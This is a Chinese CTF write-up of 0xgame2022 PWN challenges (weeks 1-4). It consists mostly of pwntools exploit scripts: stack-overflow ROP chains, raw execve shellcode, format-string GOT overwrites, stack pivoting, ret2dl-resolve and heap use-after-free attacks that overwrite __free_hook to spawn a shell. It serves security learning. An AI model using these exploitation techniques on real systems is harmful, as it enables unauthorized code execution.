ToB企服应用市场:ToB评测及商务社交产业平台

标题: 0xgame2022 PWN week1-4 [打印本页]

作者: 数据人与超自然意识 时间: 2022-11-1 20:49
标题: 0xgame2022 PWN week1-4
0xgame week1

pwn1

签到的nc，cat flag
pwn2

ret2backdoor，一个栈溢出

#encoding = utf-8
from pwn import *
import os
import sys
import time
#from ae64 import AE64
#from LibcSearcher import *
context.os = 'linux'
context.arch = 'amd64'
#context.arch = 'i386'
context.log_level = "debug"
name = './pwn2'
debug = 1
if debug:
p = remote('49.233.15.226',8002)
else:
p = process(name)
libcso = '/lib/x86_64-linux-gnu/libc.so.6'
#libcso = './'
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)
context.terminal = ['gnome-terminal','-x','sh','-c']
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,'\x00'))
uu64 = lambda data :u64(data.ljust(8,'\x00'))
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
add_idx = 1
delete_idx = 2
show_idx = 4
edit_idx = 3
def dbg():
gdb.attach(proc.pidof(p)[0])
pause()
'''
def choice(cho):
sla('enter your command: \n',cho)
def add(idx):
choice(add_idx)
sla('choise:',idx)
def delete(idx):
choice(delete_idx)
sla('Index: \n',idx)
def show(idx):
choice(show_idx)
sla('Index: ',idx)
def edit(idx,content):
choice(edit_idx)
sla('Index: ',idx)
p.sendlineafter('Message: \n',content)
'''
sys = 0x40123d
main = 0x4011FB
pl = b'a'*0x58+p64(sys)
p.recvuntil('ret2text?\n')
p.sendline(pl)
#dbg()
p.interactive()
'''
def pwn():
if __name__ == '__main__':
pwn()
'''
#print('========================================================================================')
'''
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
bin_sh = libc + libc.search('/bin/sh').next()
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']
gadget = libc_base + libc.sym['svcudp_reply'] + 0x1a
li('gadget = '+hex(gadget))
'''
'''
mov rbp,QWORD PTR [rdi+0x48]
mov rax,QWORD PTR [rbp+0x18]
lea r13,[rbp+0x10]
mov DWORD PTR [rbp+0x10],0x0
mov rdi,r13
call QWORD PTR [rax+0x28]
'''
#print('========================================================================================')
'''
def ret2libc_leak(main,got,plt,offset):
if x64_32:
payload = b'a'*offset + b'b'*8 + p64(rdi) + p64(got) + p64(plt) + p64(main)
else:
payload = b'a'*offset + b'b'*4 + p32(plt) + p32(main) + p32(got)
return payload
def fmt_w(flag,num,offset):
if flag==2:
payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hn'
elif flag==1:
payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hhn'
'''
#print('========================================================================================')
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL
0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
'''
#print('========================================================================================')
'''
def dbg(cmd=''):
os.system('tmux set mouse on')
context.terminal = ['gnome-terminal','-x','sh','-c']
gdb.attach(p,cmd)
pause()
command = 'b *'+ str(hex(gadget))+'\n'
dbg(command)
'''
#print('========================================================================================')

复制代码

pwn3

经典的ret2text

sys = 0x0401080
sys_ls = 0x040124D
bin_sh = 0x0404048
pop_rdi_ret = 0x4012c3
ret = 0x40101a
pl = b'a'*0xa8 + p64(ret)+ p64(pop_rdi_ret) + p64(bin_sh) + p64(sys)
p.sendafter('me?\n',pl)

复制代码

pwn4

ret2shellcode，将shellcode填入buf处再填满溢出回buf处即可

shellcode=asm(shellcraft.sh())
print(shellcode)
p.recvuntil(':')
buf_addr = int(p.recv(15),16)
li('buf_addr = '+hex(buf_addr))
shellcode_addr = buf_addr + 0x58 + 8
li('shellcode_addr = '+hex(shellcode_addr))
p.recvuntil('something?')
shell=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
pl = shell.ljust(88,b'\x00')+p64(buf_addr)
#pl = b'a'*0x58 + p64(shellcode_addr) + shellcode
p.sendline(pl)
#dbg()

复制代码

pwn5

ret2libc，给了puts地址所以可以直接获取libc基地址

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
ret = 0x40101a
pop_rdi_ret = 0x4012f3
main = 0x040121B
p.sendlineafter('words?\n','-255')
pl = b'a'*0x58+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendline(pl)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']
li('libc_base = '+hex(libc_base))
#dbg()
sys = libc_base + libc.sym['system']
bin_sh = libc_base + 0x1b45bd
p.sendlineafter('words?\n','-255')
pl = b'a'*0x58+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys)
p.sendline(pl)

复制代码

pwn6

一个ret2csu

gadgets1 = 0x000000000040130a
gadgets2 = 0x00000000004012f0

execve：

gadget1_addr = 0x40130A
gadget2_addr = 0x4012F0
bin_sh_addr = 0x40201D
def com_gadget(addr1 , addr2 , jmp2 , arg1 , arg2 , arg3):
payload = p64(addr1) + p64(0) + p64(1) + p64(arg1) + p64(arg2) + p64(arg3) + p64(jmp2) + p64(addr2) + b'a'*56
return payload
payload = b'a'*0x50 + b'b'*0x8 +
payload += com_gadget(gadget1_addr, gadget2_addr, elf.got['execve'], bin_sh_addr, 0, 0)
p.sendafter(b'Plz tell me sth : ', payload)
p.sendline(b'cat flag 1>&0')

复制代码

gift

一个利用点是system("$0") 等价于 system("/bin/sh")
libc文件放进IDA中可以看到puts调用了j_strlen这个函数（其实在libc 中也只有 j_xxx 的函数才会有 plt 表与 got 表），所以直接将 libc 中 j_strlen() 函数的 got 表改为 system 函数即可

到改其调用的其他某个函数在 libc 中的 got 表为 system ，并保证此时 rdi 依然是 $0 即可（也就是在 libc 的 puts 中找到它最先调用的那个函数最保险）

将libc_strlen_got写入buf中去

p.sendlineafter("address:\n", hex(libc_strlen_got))

复制代码

p.sendafter("content:\n", p64(system_addr)[:5])
#只能读进5位，但前面都是相同的，所以将sys的后5位送进去就可以修改got表里的__strlen_avx2

复制代码

p.recvuntil("gift:\n")
libc_base = int(p.recvline().strip(b"\n"), 16) - libc.sym['puts']
li("libc_base:\t" + hex(libc_base))
libc_strlen_got = libc_base + 0x1EC0A8
li('libc_strlen_got ='+hex(libc_strlen_got))
system_addr = libc_base + libc.sym['system']
#p.sendlineafter("address:\n", b'bbbb')
p.sendlineafter("address:\n", hex(libc_strlen_got))
print(b'1 = '+ p64(system_addr))
print(b'2 = '+ (p64(system_addr)[:5]))
dbg()
'''
p.sendafter("content:\n", b'aaaaa')
'''
p.sendafter("content:\n", p64(system_addr)[:5])

复制代码

week2

pwn1

格式字符串漏洞，利用达成a = 66就可以getshell

a_addr = 0x404050
payload = fmtstr_payload(6, {a_addr:66})
p.recvuntil('format?\n')
p.sendline(payload)
p.interactive()

复制代码

pwn2

卡了一会，最后做出来的这个
这个有后门，给了两个格式字符串漏洞，还给了glibc，着实被迷惑住了，方向想歪了
其实只要第二次输入的时候将puts的got表改成backdoor，当read完后，执行到下面puts就相当于触发后门了

backdoor = 0x40121B
p.recvuntil('something?\n')
pl = '%1$p-%3$p'
p.sendline(pl)
'''
stack = int(p.recv(14),16)
li(hex(stack))
'''
p.recvuntil('-')
libc = int(p.recv(14),16)-0x10DFD2
li(hex(libc))
p.recvuntil('deeper')
'''
pl = b'a'*0x68+p64(backdoor)
p.sendline(pl)
#dbg()
'''
pro = ELF("./pwn2")
puts_got = pro.got["puts"]
system_plt = pro.plt["system"]
pl = fmtstr_payload(8, {puts_got:backdoor})
p.send(pl)
p.interactive()

复制代码

pwn3

开了pie，通过第一次输入的格式字符串漏洞泄露出改一下就能拿到backdoor地址了
但要注意的点是这个后门需要加上偏移，不然跳到的不是正确的位置

bd = 0x122E
p.recvuntil('name?\n')
pl = '%27$p'
p.sendline(pl)
#1
magic = int(p.recv(12)+b'2E',16)
li('magic = '+hex(magic))
#2
#dbg()
p.recvuntil('getshell?\n')
pl = b'a'*0x88+p64(magic+6)
p.sendline(pl)
p.interactive()

复制代码

pwn4

无后门，泄露并获取canary和libc基址
第二次栈溢出即可

bd = 0x122E
p.recvuntil('name?\n')
pl = '%3$p-%23$p'
p.sendline(pl)
libc = int(p.recv(14),16)
libc_base = libc-0x10DFD2
li('libc_base = '+hex(libc_base))
p.recvuntil('-')
canary = int(p.recv(18),16)
li(hex(canary))
sys = libc_base + 0x52290
bin_sh = libc_base + 0x1b45bd
ret = 0x000000000040101a
pop_rdi_ret = 0x0000000000401323
#dbg()
p.recvuntil('getshell?\n')
pl = b'a'*0x88+p64(canary)+b'b'*0x8
pl += p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys)
p.sendline(pl)
p.interactive()

复制代码

pwn5

区别于上个题，最后有个奇怪的东西

pl = b'%39$p%40$p%43$p'
p.recvuntil('name?\n')
p.sendline(pl)
canary = int(p.recv(10),16)
li(hex(canary))
stack = int(p.recv(10),16)
li(hex(stack))
libc_base = int(p.recv(10),16) - (0xf7ce84a0-0xf7cc7000) -121
#-libc.sym['__libc_start_call_main']-121
li('libc_base = '+hex(libc_base))
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

复制代码

payload = b'a'*0x80 + p32(canary) + p32(stack - 0x10) + b'b'*4 + b's'*4

复制代码

stack-0x10：

payload = b'a'*0x80 + p32(canary) + p32(stack - 0x10) + b'b'*4 + b's'*4 # b'a'*12
payload += p32(system_addr) + b'c'*4 + p32(binsh_addr)
dbg()
p.sendlineafter("Do you know how to getshell?\n", payload)

复制代码

week3

pwn1

禁execve，有次较大的read

利用思路：

首先获取libc，再返回main地址
然后构造一个read写到bss+0x500，再返回main地址
接着通过这次读将构造好的orw写入上面的bss+0x500
接下来栈迁移bss+0x4f8到栈上执行(注意栈帧的调整)

获取libc

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
read_got = elf.got['read']
main_addr = 0x4012ff
getflag = 0x404048
pop_rdi_ret = 0x4013b3
ret = 0x40101a
bss = elf.bss()
li('bss = '+hex(bss))
p.recvuntil('try\n')
pl = b'a'*0x28 +p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(pl)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
li('libc_base'+hex(libc_base))
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']
pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rax_ret = libc_base + libc.search(asm('pop rax;ret;')).__next__()
pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
pop_rsi15_ret = libc_base + libc.search(asm('pop rsi;pop r15;ret;')).__next__()
leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
syscall = libc_base + libc.sym['syscall']

复制代码

构造一个read(0,bss+0x500,100)写到bss+0x500，再返回main地址

p.recvuntil('try\n')
poc=b'a'*0x28
poc += p64(pop_rdi_ret)
poc += p64(0)
poc += p64(pop_rsi_ret)
poc += p64(bss+0x500)
poc += p64(pop_rdx12_ret)
poc += p64(0x100)+p64(0)
poc += p64(read_addr)
poc += p64(main_addr)
p.send(poc)

复制代码

通过这次读将构造的orw写入上面的bss+0x500

# open(0x404048'./flag',0)
pl= p64(pop_rdi_ret)+p64(0x404048)+p64(pop_rsi_ret)+p64(0)+p64(open_addr)
# read(4,bss+0x500,0x50,0)
pl+= p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss+0x700)+p64(pop_rdx12_ret)+p64(0x50)+p64(0)+p64(read_addr)
# puts(bss+0x500)
pl+= p64(pop_rdi_ret)+p64(bss+0x700)+p64(puts_addr)
p.sendline(pl)

复制代码

栈迁移

payload = b'a'*0x20
payload += p64(bss+0x4f8)
payload += p64(leave_ret)
#dbg()
p.sendline(payload)
''''''
图一
payload = b'a'*0x28
payload += p64(bss+0x4f8)
payload += p64(leave_ret)
图三
payload = b'a'*0x20
payload += p64(bss+0x500)
payload += p64(leave_ret)
''''''

复制代码

pwn2

和pwn1的区别在read读的少0x50

但我们上个exp中每次payload就写的不算多，也就可以直接套第一个用
pwn3

两次read，第一次读到mmap分配的地址
第二次读很小，只要0x10能溢出

图床不够放了，明天有空再放下面的吧
<img alt="image-20221019091212309" loading="lazy">
栈迁移

pl = p64(main_addr)+p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt)+ p64(main_addr) + p64(0x405000)+b'/bin/sh\x00'
# + p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(0x405000+0x50) +p64(0) + p64(0x405000elf.sym['read'])
p.sendlineafter('name\n',pl)
pl = b'a'*0x60+ p64(0x405000) + p64(leave_ret)
p.sendafter('pivoting?\n',pl)
libc_base = uu64(r(6))-libc.sym['puts']
pop_rdx_ret = libc_base + 0x0000000000142c92
system = libc_base + libc.sym['system']
binsh = 0x30 + 0x405000

复制代码

<img alt="image-20221019091219125" loading="lazy">
<img alt="image-20221019092104370" loading="lazy">
p64(pop_rsi_ret) + p64(0) + p64(0) + p64(pop_rdx_ret) + p64(0)将rsi和rdx置零达成调用onegadgte的前提
调整栈帧跳到p64(0x404fe8)，避免写入0x405000的onegadget被0覆盖

pl = b'' #p64(pop_rdi_ret) + p64(binsh) + p64(system)
p.sendlineafter('name\n',pl)
og = libc_base + 0xe3b04
pl = b'a'*0x30 + p64(pop_rsi_ret) + p64(0) + p64(0) + p64(pop_rdx_ret) + p64(0) + p64(og)+ p64(0x404fe8) +p64(leave_ret)
p.sendafter('pivoting?\n',pl)

复制代码

<img alt="image-20221019094409793" loading="lazy">
<img alt="image-20221019094454177" loading="lazy">
<img alt="image-20221019095618845" loading="lazy">
<img alt="" loading="lazy">
pwn4

<img alt="image-20221020210427045" loading="lazy">
<img alt="image-20221020210757226" loading="lazy">
想较于前一题减去了第一次读入mmap分配地址的read
我们选择将shellcode写入bss段0x0404040，再栈迁移执行
<img alt="image-20221020212016071" loading="lazy">
第一次构造read(bss+0x150)
获取puts真实地址再转到read为后面进行下一次溢出
填满0x50后，进行栈迁移来执行来获取libc_base
获取libc基址后将onegadget送入，填满并对齐后进行栈迁移来执行
但要注意栈帧的调整

def pwn():
pl = b'a'*0x50 + p64(0x0404040 + 0x150) + p64(0x004011FD) #bss+0x150 read
#debug()
p.sendafter('do you know stack pivoting?\n',pl)
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
pl = p64(0x0404040 + 0x100) + p64(0x0401283) + p64(puts_got) + p64(puts_plt) +p64(0x004011FD) #rdi read
pl = pl.ljust(0x50,b'\x00')
pl += p64(0x0404040 + 0x100) +p64(0x040121d) #leave_ret
p.send(pl)
libcbase = uu64(r(6)) - libc.sym['puts']
leak('libcbase',libcbase)
pl = p64(0x000000000002601f + libcbase) + p64(0) + p64(libcbase + 0x0000000000142c92) + p64(0) + p64(libcbase + 0xe3b04) #rsi rdx og
pl = pl.ljust(0x50,b'a')
pl += p64(0x0404040 + 0xa8) + p64(0x040121d) #调栈帧 leave_ret
p.send(pl)
itr()
if __name__ == '__main__':
pwn()

复制代码

whitegive_1

保护全开
<img alt="image-20221021150220900" loading="lazy">
flag被读到stream和unk_4080
<img alt="image-20221021150312356" loading="lazy">
送了libc基址，有4次任意读

p.recvuntil('gift :')
libcbase = int(p.recv(15),16) - libc.sym['puts']
li('libc_base = '+hex(libcbase))
en = libcbase + libc.sym['__environ']
pl = p64(en)
p.sendafter('Please input the address you want to query : ',pl)
stack = uu64(r(6))
leak('stack',stack)
dbg()
pl = p64(stack-0x30)
p.sendafter('Please input the address you want to query : ',pl)
pie = uu64(r(6)) - 0x118e
leak('pie',pie)
flag = pie + 0x4080
pl = p64(flag)
p.sendafter('Please input the address you want to query : ',pl)
pl = p64(stack - 0x168)
p.sendafter('Please input the address you want to query : ',pl)
itr()

复制代码

第一次获取stack地址

en = libcbase + libc.sym['__environ']
pl = p64(en)
p.sendafter('Please input the address you want to query : ',pl)
stack = uu64(r(6))
leak('stack',stack)

复制代码

0x7fff4419f708-0x30处找到一处程序地址
<img alt="image-20221021150930488" loading="lazy">

pl = p64(stack-0x30)
p.sendafter('Please input the address you want to query : ',pl)
pie = uu64(r(6)) - 0x118e
leak('pie',pie)

复制代码

破解了pie，然后读取bss段的后半段flag

flag = pie + 0x4080
pl = p64(flag)
p.sendafter('Please input the address you want to query : ',pl)

复制代码

再读取前半段flag
<img alt="image-20221021151409874" loading="lazy">
<img alt="image-20221021151342352" loading="lazy">

pl = p64(stack - 0x168)
p.sendafter('Please input the address you want to query : ',pl)

复制代码

whitegive_1_plus

4次改为两次读
在只有libc基址的情况下获取进程地址
我们找到了stderr处
<img alt="image-20221021153010059" loading="lazy">

stderr = libc_base + 0x1EBDB0
li(hex(stderr))
p.sendafter('query :',p64(stderr))

复制代码

打两次分别获取前后两端flag

flag = uu64(r(6))-0x4040+0x4080
li(hex(flag))
p.sendafter('query :',p64(flag))
'''
p.sendafter('query :',p64(environ))
p.recv()
stack = uu64(r(6))
li('stack = '+hex(stack))
dbg()
pl = p64(stack - 0x168)
p.sendafter('query :',pl)
'''

复制代码

whitegive_2

<img alt="image-20221021154528018" loading="lazy">
<img alt="image-20221021154615148" loading="lazy">
一次格式字符串任意读
一次0x10大小溢出
分别读了libc和stack
onegadget + 栈迁移

def pwn():
pl = '%8$p%1$p'
p.sendafter('Please leave your name :\n',pl)
ru('Hello, ')
libcbase = int(r(14),16) - 0x7fa72ecdf2e8 + 0x7fa72eaee000
leak('libcbase',libcbase)
stack = int(r(14),16)
leak('stack',stack)
leave = libcbase + 0x00000000000578c8
og = libcbase + 0xe3b04
li(hex(og))
rsi = libcbase + 0x000000000002601f
li(hex(rsi))
rdx = libcbase + 0x0000000000142c92
pl = p64(rdx) + p64(0) + p64(rsi) + p64(0) + p64(og)
pl = pl.ljust(0x30,b'\x00')
pl += p64(stack+1) + p64(leave)
p.sendafter('Now, please send your message :\n',pl)
itr()
if __name__ == '__main__':
pwn()

复制代码

payload = b'A' * 24 + p64(addr_pop4) + p64(addr_pop_rdi) + p64(elf.got['write']) + p64(elf.symbols['puts']) + p64(elf.symbols['main'])

复制代码

whitegive_3

ret2dl-resolve

payload = p64(0x4012AA)+p64(0)+p64(1)+p64(0)+p64(0x404020)+p64(0x1)+p64(0x404028)+p64(0x40 1290)
payload += p64(0)+p64(0)+p64(1)+p64(0)+p64(0x404100)+p64(0x900)+p64(0x404028)+p64(0x401290)
payload += p64(0)+p64(0)+p64(1)+p64(0x404100)+p64(0)+p64(0)+p64(0x404020)+p64(0x401290)
p.send(b"a"*32+p64(0)+payload) sleep(1)
p.send(b'\x15')
sleep(1)
p.send(b'/bin/sh\x00'+b'a'*0x33)
p.sendline("exec 1>&0")

复制代码

week4

pwn1

UAF
<img alt="image-20221023131908790" loading="lazy">
<img alt="image-20221023131700423" loading="lazy">

edit(6,0x80,p64(free_hook))

复制代码

def choice(cho):
sla('>> ',str(cho))
def add(index,size,content):
choice(add_idx)
sla('\n',str(index))
sla('\n',str(size))
sa('\n',content)
def delete(index):
choice(delete_idx)
sla('\n',str(index))
def show(index):
choice(show_idx)
sla('\n',str(index))
def edit(index,size,content):
choice(edit_idx)
sla('\n',str(index))
sla('\n',str(size))
sla('\n',content)
for i in range(8):
add(i,0x80,'\n')
for i in range(7):
delete(i)
add(8, 0x10, '\n')
delete(7)
add(8, 0x40, '\n')
show(8)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-138-0x10-libc.sym['__malloc_hook']
li(hex(libc_base))
system = libc_base + libc.sym['system']
bin_sh = libc_base + 0x7fbc1675d5bd - 0x7fbc165a9000
free_hook = libc_base + libc.sym['__free_hook']
li(hex(free_hook))
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
edit(6,0x80,p64(free_hook))
def add2(index,size,content):
choice(add_idx)
sla('\n',str(index))
sla('\n',str(size))
sla('\n',content)
add2(0,0x80,b'0')
add2(0,0x80,p64(system))
add2(0,0x10,b'/bin/sh\x00')
delete(0)

复制代码

pwn2

相较前一题没了edit
<img alt="image-20221101142559112" loading="lazy">
一开始卡住了，将b去掉即可
<img alt="image-20221101163312242" loading="lazy">

add(20,0x10,b'/bin/sh\x00') --》 add(20,0x10,'/bin/sh\x00')

复制代码

exp：

add(0,0x1000,'aaa')
add(20,0x10,'/bin/sh\x00')
delete(0)
show(0)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) -96 -0x10 -libc.sym['__malloc_hook'] #-0x2a
li('libc_base = '+hex(libc_base))
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']
syscall = libc_base + libc.sym['syscall']
system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
for i in range(9):
add(i,0x10,'\n')
for i in range(9):
delete(i)
delete(7)
for i in range(7):
add(i+2,0x10,'\n')
def add2(index,size,content):
choice(add_idx)
sla('\n',str(index))
sla('\n',str(size))
p.sendafter('\n',content)
add2(11,0x10,p64(free_hook))
add2(12,0x10,'\n')
add2(13,0x10,'\n')
add2(14,0x10,p64(system))
p.recvuntil(b'>> ')
p.sendline("2")
p.recvuntil(b'Please input index\n')
p.sendline("20")

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)